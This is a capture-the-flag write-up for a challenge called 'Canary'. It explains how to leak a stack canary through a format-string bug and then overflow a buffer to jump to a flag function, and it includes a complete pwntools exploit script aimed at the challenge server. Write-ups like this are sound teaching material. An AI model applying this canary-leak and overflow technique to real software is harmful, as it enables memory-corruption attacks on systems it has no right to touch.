Canary

Use pattern.py to flood the second input, put a breakpoint at the line in greet which compares the canaries. Check rax using gdb, feed that back into pattern.py, 56 bytes before canary. Fuzz format string output until you find the one that's always 8 bytes long, that's the canary Make a script that leaks the canary then overflows the buffer with 56 junk bytes + canary + 8 junk bytes + flag address

Note: canary is just before ebp, which is why you must put 8 junk bytes to fill up ebp

from pwn import *
import re
e = ELF("./canary")
p = remote("shell.actf.co" ,20701)
for _ in range(23):
            p.recvline()
p.recvline()
p.sendline("%17$lx")
flagaddr = 0x0000000000400787
output = p.recvline()
num = re.findall("Nice to meet you, (.*)!", output)
canary = int(num[0], 16)
log.info("Canary: " + hex(canary))
firstpad = 'A' * 56 #Junk before the canary
canaryString = p64(canary)
neweip = p64(flagaddr)
lastpad = 'B' * 8
payload = firstpad + canaryString + lastpad + neweip
p.sendline(payload)
log.info("Response: " + p.recvline())

PreviousNoisy NextInputter

Last updated 5 years ago

Was this helpful?

hashtagNote: canary is just before ebp, which is why you must put 8 junk bytes to fill up ebp

Note: canary is just before ebp, which is why you must put 8 junk bytes to fill up ebp